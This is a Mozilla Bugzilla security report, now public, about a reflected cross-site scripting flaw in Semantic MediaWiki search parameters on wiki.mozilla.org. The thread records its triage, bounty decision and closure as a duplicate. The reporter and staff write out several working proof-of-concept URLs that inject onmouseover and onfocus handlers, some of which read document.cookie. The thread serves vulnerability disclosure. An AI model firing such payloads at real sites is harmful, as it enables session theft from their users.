Closed Bug 1041392 Opened 11 years ago Closed 10 years ago

xss in semantic search parameters

Categories

(Websites :: wiki.mozilla.org, defect)

Product:
Websites
Component:
wiki.mozilla.org
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

(Not tracked)

Status:
RESOLVED DUPLICATE of bug 801027

People

(Reporter: jeetjaiswal0, Assigned: curtisk)

Details

(Keywords: reporter-external, Whiteboard: [site:wiki.mozilla.org][reporter-external])

Attachments

(1 file)

xs.JPG
129.32 KB, image/jpeg
Details
Attached image xs.JPG
User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0 (Beta/Release) Build ID: 20140605174243 Steps to reproduce: Hello I am, Jitendra Jaiswal (security researcher) During my research I found some high security issue xss (cookie stolen) vulnerability in main domain http://wiki.mozilla.org/ example : Domain: http://wiki.mozilla.org/ Poc url steps for reproduce issue steps by using one of them wiki.mozilla.org/index.php?eq=yes&offset=50%22%20onmouseover%3dprompt("xss")%20bad%3d%22&p=format%3Dtemplate/mainlabel%3D-2D/template%3DSecReviewActionTable&po=%3F%23-%0A%3FSecReview%20name%23-%0A%3FSecReview%20action%20item%20status%23-%0A%3FFeature%20version%23-%0A%3FSecReview%20action%20items%23-%0A&q=[[Category:SecReview]]%20[[SecReview%20action%20item%20status::In%20Progress]]&title=Special:Ask for access cookie : wiki.mozilla.org/index.php?eq=yes&offset=50%22%20onmouseover%3dprompt(document.cookie)%20bad%3d%22&p=format%3Dtemplate/mainlabel%3D-2D/template%3DSecReviewActionTable&po=%3F%23-%0A%3FSecReview%20name%23-%0A%3FSecReview%20action%20item%20status%23-%0A%3FFeature%20version%23-%0A%3FSecReview%20action%20items%23-%0A&q=[[Category:SecReview]]%20[[SecReview%20action%20item%20status::In%20Progress]]&title=Special:Ask steps for issue reproduce 1. go to below url : wiki.mozilla.org/index.php?eq=yes&offset=50%22%20onmouseover%3dprompt(document.cookie)%20bad%3d%22&p=format%3Dtemplate/mainlabel%3D-2D/template%3DSecReviewActionTable&po=%3F%23-%0A%3FSecReview%20name%23-%0A%3FSecReview%20action%20item%20status%23-%0A%3FFeature%20version%23-%0A%3FSecReview%20action%20items%23-%0A&q=[[Category:SecReview]]%20[[SecReview%20action%20item%20status::In%20Progress]]&title=Special:Ask load the url in browser when you give above link to any user the xss payload stored in the page which is open now that url have an xss payload which access cookie as offset was set to 50" onmouseover=prompt(document.cookie) bad=" now when you/user move mouse courser for selecting template on page which is shown in attachment image link that make an xss alert which we put in url why this work : Vulnerability description This script is vulnerable to stored Cross Site Scripting (XSS) attacks. Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser. Attack details URL encoded GET input offset was set to 50" onmouseover=prompt(document.cookie) bad=" The input is reflected inside a tag parameter between double quotes. . all the proof attach with this thats show xss is work and can be access cookie of an user related to site also send image for make alert for mouse move on location link of all xss proof m send link bcz we can send here only one file https://www.dropbox.com/s/gmdwpx0vv28338k/fxss.JPG https://www.dropbox.com/s/rtd3wdvyax0y95t/xs.JPG?m= https://www.dropbox.com/s/vk7qfgnu4y6yzez/xss%20mozila.JPG https://www.dropbox.com/s/84fsbn1e5clp0ah/xxmozila.JPG poc image in attchments Actual results: in the results we can say its make an xss high security issue for users who use this site steps for issue reproduce 1. go to below url : wiki.mozilla.org/index.php?eq=yes&offset=50%22%20onmouseover%3dprompt(document.cookie)%20bad%3d%22&p=format%3Dtemplate/mainlabel%3D-2D/template%3DSecReviewActionTable&po=%3F%23-%0A%3FSecReview%20name%23-%0A%3FSecReview%20action%20item%20status%23-%0A%3FFeature%20version%23-%0A%3FSecReview%20action%20items%23-%0A&q=[[Category:SecReview]]%20[[SecReview%20action%20item%20status::In%20Progress]]&title=Special:Ask load the url in browser when you give above link to any user the xss payload stored in the page which is open now that url have an xss payload which access cookie as offset was set to 50" onmouseover=prompt(document.cookie) bad=" now when you/user move mouse courser for selecting template on page which is shown in attachment image link that make an xss alert which we put in url Expected results: we can use xss filter by using xss can't work and make users safe on platform of Mozilla
I don't see an xss here the cookie is being displayed by an in content call to onmouseover=prompt(document.cookie) and an onmouseover=prompt("xss") so this is not executing scripts from outside the domain thus not cross-site. Have you found an instance here where you can execute scripts from another domain?
Flags: needinfo?(jeetjaiswal0)
Assignee: nobody → curtisk
Whiteboard: [site:wiki.mozilla.org][reporter-external][verif?]
sorry for mistake as my first link not work but in my second link https://wiki.mozilla.org/index.php?eq=yes&offset=50%22%20onmouseover%3dalert%282%29%20bad%3d%22&p=format%3Dtemplate/mainlabel%3D-2D/template%3DSecReviewActionTable&po=%3F%23-%0A%3FSecReview%20name%23-%0A%3FSecReview%20action%20item%20status%23-%0A%3FFeature%20version%23-%0A%3FSecReview%20action%20items%23-%0A&q=[[Category:SecReview]]%20[[SecReview%20action%20item%20status::In%20Progress]]&title=Special:Ask thats properly work and give you an xss alert of 2 numaric and as you say its not cross site issue that i want to say its an type of xss issue if you not know about that then read owasp site https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29 this define all type of issue and also you can see its an xss when users use this url that contain call onmouse over over xss store on page and when users go to select tamplete this xss execute and one more thing all of field of this url have xss vulnrability m use xss script only one field offset but other all field also vulnrable for this attack
Flags: needinfo?(jeetjaiswal0)
At first glance this appears to be a dupe of bug 801027, however we are on mediawiki 1.19.11, which was released earlier this year. I wonder if there was a regression since bug 801027 says the upstream bug was fixed mid 2013
Status: UNCONFIRMED → NEW
Ever confirmed: true
Whiteboard: [site:wiki.mozilla.org][reporter-external][verif?] → [site:wiki.mozilla.org][reporter-external]
Group: mozilla-services-security → websites-security
Component: Web Site → wiki.mozilla.org
Product: Mozilla Services → Websites
(In reply to David Chan [:dchan] from comment #4) > At first glance this appears to be a dupe of bug 801027, however we are on > mediawiki 1.19.11, which was released earlier this year. I wonder if there > was a regression since bug 801027 says the upstream bug was fixed mid 2013 bro how i seen this issue 801027 its block for me and if you upgrade this then its not an duplicate bro and as i say my link all parameter link sort offset title limit and all other parameter all are have this vulnrability
Summary: high security issue xss (cookie stolen) vulnerability in domain http://wiki.mozilla.org/ → xss in semantic search parameters
Mark, could you take a look at this please?
Flags: needinfo?(mah)
(In reply to Jitendra jaiswal from comment #5) > (In reply to David Chan [:dchan] from comment #4) > > At first glance this appears to be a dupe of bug 801027, however we are on > > mediawiki 1.19.11, which was released earlier this year. I wonder if there > > was a regression since bug 801027 says the upstream bug was fixed mid 2013 > > bro how i seen this issue 801027 its block for me > > and if you upgrade this then its not an duplicate bro > > and as i say my link all parameter link sort offset title limit and all if you are not belive m give you more link for same issue with different parameter is this i am use sort parameter for xss payload https://wiki.mozilla.org/index.php?title=Special%3AAsk&q=[[Category%3ASecReview]]+[[SecReview+action+item+status%3A%3AIn+Progress]]&po=%3F%23-%0D%0A%3FSecReview+name%23-%0D%0A%3FSecReview+action+item+status%23-%0D%0A%3FFeature+version%23-%0D%0A%3FSecReview+action+items%23-%0D%0A&eq=yes&p[format]=template&sort_num=&order_num=ASC&p[limit]=&p[offset]=&p[link]=all&p[sort]=50%22+onmouseover%3Dalert%283%29+bad%3D%22&p[order]=&p[headers]=show&p[mainlabel]=-&p[intro]=&p[outro]=&p[searchlabel]=%E2%80%A6+further+results&p[default]=&p[sep]=%2C&p[template]=SecReviewActionTable&p[userparam]=&p[introtemplate]=&p[outrotemplate]=&eq=yes in this i am use link parameter https://wiki.mozilla.org/index.php?title=Special%3AAsk&q=[[Category%3ASecReview]]+[[SecReview+action+item+status%3A%3AIn+Progress]]&po=%3F%23-%0D%0A%3FSecReview+name%23-%0D%0A%3FSecReview+action+item+status%23-%0D%0A%3FFeature+version%23-%0D%0A%3FSecReview+action+items%23-%0D%0A&eq=yes&p[format]=template&sort_num=&order_num=ASC&p[limit]=&p[offset]=&p[link]=50%22+onmouseover%3Dalert%284%29+bad%3D%22&p[sort]=&p[order]=&p[headers]=show&p[mainlabel]=-&p[intro]=&p[outro]=&p[searchlabel]=%E2%80%A6+further+results&p[default]=&p[sep]=%2C&p[template]=SecReviewActionTable&p[userparam]=&p[introtemplate]=&p[outrotemplate]=&eq=yes in this i am use order parameter https://wiki.mozilla.org/index.php?title=Special%3AAsk&q=[[Category%3ASecReview]]+[[SecReview+action+item+status%3A%3AIn+Progress]]&po=%3F%23-%0D%0A%3FSecReview+name%23-%0D%0A%3FSecReview+action+item+status%23-%0D%0A%3FFeature+version%23-%0D%0A%3FSecReview+action+items%23-%0D%0A&eq=yes&p[format]=template&sort_num=&order_num=ASC&p[limit]=&p[offset]=&p[link]=&p[sort]=&p[order]=50%22+onmouseover%3Dalert%284%29+bad%3D%22&p[headers]=&p[mainlabel]=-&p[intro]=&p[outro]=&p[searchlabel]=%E2%80%A6+further+results&p[default]=&p[sep]=%2C&p[template]=SecReviewActionTable&p[userparam]=&p[introtemplate]=&p[outrotemplate]=&eq=yes as i say all other also vulnerable for same
Note that I didn't mark it as a dupe since I couldn't determine if it was a regression or not. A minimal test case is. https://wiki.mozilla.org/index.php?title=Special%3AAsk&q=&p[format]=template&p[foo]=%22%20autofocus%20onfocus=alert%281%29%20%22 There is some interaction with the "q" parameter, p[format]=template and p[key] . Note that "key" can be anything. Under the above circumstances, the querystring it put inside a data-uri without proper encoding. This is the resulting HTML <select id="formatSelector" name="p[format]" data-url="/index.php?title=Special:Ask&amp;showformatoptions=this.value&amp;params[foo]=\" autofocus="" onfocus="alert(1)" \"&params[offset]="&amp;params[limit]=&quot;">
Yah bro now you get my point the issue with the q parameter=tamplete parameter And yes here you use some filter for Xss but for Xss useing event you are not filter here that make risk or Xss in site or soft whataver it is bro m what to ask that acording to you its patchable issue or not ...
Adding Wikimedia's security engineer and the other member of the MediaWiki release team.
Flags: needinfo?(mah)
Actually, this looks like a problem more in SMW, not MW itself. Finding someone who can look at that.
Looks like this is fixed in the latest SMW. At least, the following does not work: http://www.semantic-mediawiki.org/wiki/Special:Ask?q=&p[searchlabel]=%22%20autofocus%20onfocus=alert%281%29%20%22
(In reply to Mark A. Hershberger (hexmode) from comment #11) > Actually, this looks like a problem more in SMW, not MW itself. Finding > someone who can look at that. bro m not understand what you want to say your issue url and my are different and your issue now not work but my issue still work .... https://wiki.mozilla.org/index.php?title=Special%3AAsk&q=&p[format]=template&p[foo]=%22%20autofocus%20onfocus=alert%28document.cookie%29%20%22
(In reply to Jitendra jaiswal from comment #13) > (In reply to Mark A. Hershberger (hexmode) from comment #11) > > Actually, this looks like a problem more in SMW, not MW itself. Finding > > someone who can look at that. > > bro m not understand what you want to say Your use of "bro" is strange. In this context it reminds me of a brogrammer (http://www.cnn.com/2012/05/10/opinion/trapani-brogrammer-culture/index.html). In any case, you did find a genuine bug in the SemanticMediaWiki extension. It was reported back in April and fixed then in SemanticMediaWiki. The fix hasn't yet been deployed to wiki.mozilla.org, so that site is still vulnerable.
No bro mean in India its as like big brother so m say that word and as you say find a genuine bug in the SemanticMediaWiki extension so that mean my issue confirm ... ?
(In reply to Jitendra jaiswal from comment #16) > so that mean my issue confirm ... ? You've found an issue on wiki.mozilla.org that is the result of an unpatched fix to a known problem. I can confirm that. I'm not in a position to make any other statement about the issue.
(In reply to Mark A. Hershberger (hexmode) from comment #17) > is the result of an unpatched fix to a known problem. Err, I meant "is the result of a known problem that hasn't been fixed by applying the patch that solves the problem."
its gone one year and also in my issue not one a one parameter have this issue have all parameter of my url are vulnerable that mean xss work on all parameter or field so any one can confirm me this is valid for Mozilla bug bounty program ...?
I've nominated this bug for the bounty committee to consider, that does not mean it will receive a bounty but they will review the issue and make a decision.
Flags: sec-bounty?
Yah I am already receive a mail for deep look on its may be tthats help in that Thanks
HELLO AS ALL SAY THE ISSUE IS VALID CAN ANY ONE TELL ME ANY UPDATE ABOUT THIS ISSUE M NOT RECEIVE ANY UPDATE FOR THAT AND ITS GONE A MONTH
Hi Jitendra, Thanks for reporting this issue, however wiki.mozilla.org is not covered under the current bounty program. [1] We intend to expand the bounty program in the future and will look into adding wiki. Unfortunately the committee has decided not to pay a bounty for this issue. [1] - https://www.mozilla.org/security/bug-bounty-faq-webapp.html#eligible-bugs
Flags: sec-bounty? → sec-bounty-
thanks to all of you for giving a good response me :P
I'm calling this a dupe of bug 801027. The STR are exactly the same. I'm waiting on access to the upstream bug, but clearly whatever the fix was didn't fix this issue (which is likely in the extension).
Status: NEW → RESOLVED
Closed: 10 years ago
Resolution: --- → DUPLICATE
(In reply to Gordon P. Hemsley [:GPHemsley] from comment #25) > I'm calling this a dupe of bug 801027. The STR are exactly the same. > > I'm waiting on access to the upstream bug, but clearly whatever the fix was > didn't fix this issue (which is likely in the extension). Sorry about that, the bug should have been public. I just opened it up: https://bugzilla.wikimedia.org/show_bug.cgi?id=46852 The patch (https://gerrit.wikimedia.org/r/#/c/57433/) is included in the REL1_23 branch of the extension, and also the "1.9.x" branch. The current download of the SMW bundle from http://www.mediawiki.org/wiki/Semantic_Bundle also have the patch. Where is mozilla pulling the extension from?
Group: websites-security
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: